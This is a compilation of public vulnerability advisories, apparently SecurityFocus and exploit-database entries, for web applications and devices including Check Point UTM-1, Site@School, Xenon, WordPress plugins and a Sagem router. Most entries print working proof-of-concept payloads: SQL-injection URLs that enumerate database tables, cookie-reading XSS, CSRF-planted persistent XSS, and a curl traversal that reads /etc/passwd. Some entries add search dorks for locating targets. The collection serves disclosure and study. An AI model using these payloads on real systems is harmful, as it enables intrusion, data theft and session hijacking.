  14. source: https://www.securityfocus.com/bid/50167/info asgbookphp is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://code.google.com/p/asgbookphp/ asgbookphp 1.9 is vulnerable; other versions may also be affected. http://www.example.com/asgbookphp/index.php/>'><ScRiPt>alert(771818860)</ScRiPt>
  15. source: https://www.securityfocus.com/bid/50168/info Multiple Toshiba e-Studio devices are prone to a security-bypass vulnerability. Successful exploits will allow attackers to bypass certain security restrictions and gain access in the context of the device. http://www.example.com/TopAccess//Administrator/Setup/ScanToFile/List.htm
  16. source: https://www.securityfocus.com/bid/50141/info Xenon is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/news_detail.php?id=-9+union+select+0,1,2,3,group_concat%28table_name%29,5+from+information_schema.tables http://www.example.com/viewstory.php?id=-8+and+1=1+union+select+0,1,2,group_concat%28column_name%29,4+from+information_schema.columns+where+table_name=0x7573657273 http://www.example.com/event.php?id=-153+union+select+0,1,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables
  17. source: https://www.securityfocus.com/bid/50189/info Check Point UTM-1 Edge and Safe are prone to multiple security vulnerabilities, including: 1. Multiple cross-site scripting vulnerabilities 2. Multiple HTML-injection vulnerabilities 3. Multiple cross-site request forgery vulnerabilities 4. Multiple URI-redirection vulnerabilities 5. An information-disclosure vulnerability An attacker may leverage these issues to access sensitive information, redirect an unsuspecting victim to an attacker-controlled site, or steal cookie-based authentication credentials, to perform unauthorized actions in the context of a user's session. Versions prior to Check Point UTM-1 Edge and Safe 8.2.44 are vulnerable. Tested on versions 7.5.48x, 8.1.46x and 8.2.2x. 1) The following demonstrate the reflective XSS flaws:- a) The Ufp.html page is vulnerable to XSS via the url parameter It works by submitting a malicious url parameter to the ufp.html page http://www.example.com/pub/ufp.html?url=";><script>alert(1)</script>&mask=000&swpreview=1 This works with firmware versions 7.5.48x, 8.1.46x and 8.2.2x. b) The login page is also vulnerable to an XSS via the malicious session cookie It works by submitting a malicious session cookie to the login page Cookie: session="><script>alert(1)</script> c) An authenticated XSS exists within the diagnostics command http://www.example.com/diag_command.html?sw__ver=blah1&swdata=blah2&sw__custom='";);alert(1);// (this might need to be submitted twice) 2) The following demonstrate the persistent XSS flaws and XSRF flaws:- a) The blocked URL warning page is vulnerable to a persistent XSS attack placing any internal users at risk of attack when the page is displayed. First an attacker has to trick the administrator to follow a XSRF attack; the (swsessioncookie) session cookie for simplicity sake is shown though JavaScript document.cookie can be used to subvert this protection (see paper). 
http://www.example.com/UfpBlock.html?swcaller=UfpBlock.html&swsessioncookie=20KHYp5-oS7rKmS-a4rq4j&swsave=1&ufpblockhttps=0&ufpbreakframe=&backurl=WebRules.html&ufpblockterms=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E Firewall users then visiting blocked sites will have the blocked page displayed and the attack carried out. http://www.example.com/pub/ufp.html?url=www.blockedUrl.com&mask=000&swpreview=1 b) The Wi-Fi hotspot landing page on Wi-Fi enabled firewalls is also vulnerable, with any user using the Wi-Fi access point being at risk. First an attacker has to trick the administrator to follow a XSRF attack, the (swsessioncookie) session cookie for simplicity sake is shown though JavaScript document.cookie can be used to subvert this protection (see paper). http://www.example.com/HotSpot.html?swcaller=HotSpot.html&swsessioncookie=20KHYp5-oS7rKmS-a4rq4j&swsave=1&hotspotnets=00000000000000000000000000000000000000&hotspotpass=1&hotspotmulti=1&hotspothttps=0&hotspotnet1=0&hotspotnet2=0&hotspotnet3=0&hotspotenf=0&hotspottitle=Welcome+to+My+HotSpot&hotspotterms=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&thotspotpass=on&thotspotmulti=on Firewall users then visiting the Wi-Fi landing page will then have the attack carried out. http://www.example.com/pub/hotspot.html?swpreview=1 3) The following demonstrate the (authenticated) offsite redirection flaws:- a) Enter the following URL to redirect http://www.example.com/12?swcaller=http://www.procheckup.com b) Enter the following URL and then press back button. http://www.example.com/UfpBlock.html?backurl=http://www.procheckup.com 4) The following demonstrate the Information disclosure flaws (no authentication needed) It was found that the /pub/test.html program disclosed information, regarding the patch level used, licensing and the MAC addresses to unauthenticated users. 
a) On early firmware versions 5.0.82x, 6.0.72x & 7.0.27x 7.5.48x Just requesting http:// www.example.com/pub/test.html is sufficient b) However this no longer worked on versions 8.1.46x & 8.2.26x however adding the URL parameter and a double quote bypassed this check https:// www.example.com/pub/test.html?url="
  18. source: https://www.securityfocus.com/bid/50195/info Site@School is prone to multiple SQL-injection and cross-site scripting vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. XSS: http://www.example.com/school/starnet/index.php?option=stats&suboption=&#039;"</style></script><script>alert(document.cookie)</script> http://www.example.com/school/starnet/index.php?option=pagemanager&suboption=newsection&site=&#039;"</style></script><script>alert(document.cookie)</script> http://www.example.com/school/starnet/index.php?option=modulemanager&modoption=edit&module_number="</style></script><script>alert(document.cookie)</script> http://www.example.com/school/starnet/index.php?option=modulemanager&module=&#039;"</style></script><script>alert(document.cookie)</script> SQL Injection: http://www.example.com/school/starnet/index.php?option=modulemanager&modoption=edit&module_number=[sql injection] http://www.example.com/school/starnet/index.php?option=modulemanager&module=[sql injection]
  19. # Title : Sagem F@st 3304-V2 Directory Traversal Vulnerability
      # Vendor : http://www.sagemcom.com
      # Severity : High
      # Tested Router : Sagem F@st 3304-V2 (3304, other versions may also be affected)
      # Date : 2015-03-01
      # Author : Loudiyi Mohamed
      # Contact : Loudiyi.2010@gmail.com
      # Blog : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603

      # Vulnerability description:
      Sagem Fast is an ADSL Router using a web management interface in order to change configuration settings.
      The web server of the router is vulnerable to directory traversal which allows reading files by sending encoded '../' requests.

      The vulnerability may be tested with the following command-line:
      curl -v4 http://192.168.1.1//../../../../../../../../../../etc/passwd

      Or directly from the browser:
      http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
      http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fnet%2farp
  20. # Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ]
      # Google Dork: [ Designed by Photocrati ] also [powered by Photocrati]
      # Date: [23 / 09 / 2011 ]
      # Exploit Author: [ ayastar ]
      # Email : dmx-ayastar@hotmail.fr
      # Software Link: [ http://www.photocrati.com ]
      # Version: [4.X.X]
      # Tested on: [ windows 7 ]

      -------- details |
      =======================================================
      Software : photocrati
      version : 4.X.X
      Risk : High
      remote : yes

      An attacker can do a remote injection in the site URL to get some sensitive information.
      Almost all versions are infected by this vuln.
      =======================================================
      Exploit code :
      http://sitewordpress/wp-content/themes/[photocrati-Path-theme]/ecomm-sizes.php?prod_id=[SQL]

      greetz to all muslims and all tryag members :) from morocco
  21. # Exploit Title: WordPress: cp-multi-view-calendar.1.1.4 [SQL Injection vulnerabilities]
      # Date: 2015-02-28
      # Google Dork: Index of /wordpress/wp-content/plugins/cp-multi-view-calendar
      # Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
      # Vendor Homepage: http://wordpress.dwbooster.com/
      # Software Link: https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.1.4.zip
      # Version: 1.1.5
      # Tested on: windows 7 ultimate + sqlmap 0.9. It's a PHP application
      # OWASP Top10: A1-Injection
      # Mitigations: Upgrade to version 1.1.5

      Greetz to Christian Uriel Mondragon Zarate

      Video demo of unauthenticated user sqli exploitation vulnerability :

      ###################################################################
      ADMIN PAGE SQL INJECTION
      -------------------------------------------------
      http://localhost/wordpress/wp-admin/admin-ajax.php?action=ajax_add_calendar
      sql injection in post parameter viewid
      -------------------------------------------------------------------
      http://localhost/wordpress/wp-admin/admin-ajax.php?action=ajax_delete_calendar
      sql injection in post parameter id

      ########################################
      UNAUTHENTICATED SQL INJECTION
      -----------------------------------------------------------------
      http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1
      sql injection in id parameter
      -----------------------------------------------------------------------
      http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1
      datapost viewtype=list&list_order=asc
      vuln variable list_order

      ################################################################
      CROSS-SITE SCRIPTING VULNERABILITY
      ----------------------------------------------------------
      http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&weekstartday=alert(12)&f=edit&id=1
      cross-site script weekstartday parameter
      ###################################################

      ==================================
      time-line
      26-02-2015: vulnerabilities found
      27-02-2015: reported to vendor
      28-02-2015: release new cp-multi-view-calendar version 1.1.4
      28-02-2015: full disclosure
      ===================================
  22. source: https://www.securityfocus.com/bid/50018/info BuzzScripts BuzzyWall is prone to an information-disclosure vulnerability because it fails to sufficiently validate user-supplied data. An attacker can exploit this issue to download local files in the context of the webserver process. This may allow the attacker to obtain sensitive information; other attacks are also possible. BuzzyWall 1.3.2 is vulnerable; other versions may also be affected. http://www.example.com/resolute.php?img=config.php
  23. source: https://www.securityfocus.com/bid/50019/info The 'com_expedition' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_expedition&task=detail&id=-3235'
  24. source: https://www.securityfocus.com/bid/50039/info GoAhead WebServer is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. GoAhead WebServer 2.18 is vulnerable; other versions may also be affected. POST /goform/AddAccessLimit HTTP/1.1 url=<script>alert(1337)</script>&group=test&method=3&ok=OK
  25. source: https://www.securityfocus.com/bid/50022/info Jaws is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow a remote attacker to obtain sensitive information or execute arbitrary script code in the context of the Web server process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. Jaws 0.8.14 is vulnerable; other versions may also be affected. http://www.example.com/jaws/libraries/pear/MDB2.php?file_name=[RFI] http://www.example.com/jaws/libraries/pear/MDB2.php?file_name=[RFI] http://www.example.com/jaws/libraries/pear/Services/Weather.php?service=[RFI] http://www.example.com/jaws/libraries/pear/SOAP/Transport.php?transport_include=[RFI] http://www.example.com/jaws/libraries/pear/Crypt/RSA/MathLoader.php?class_filename=[RFI]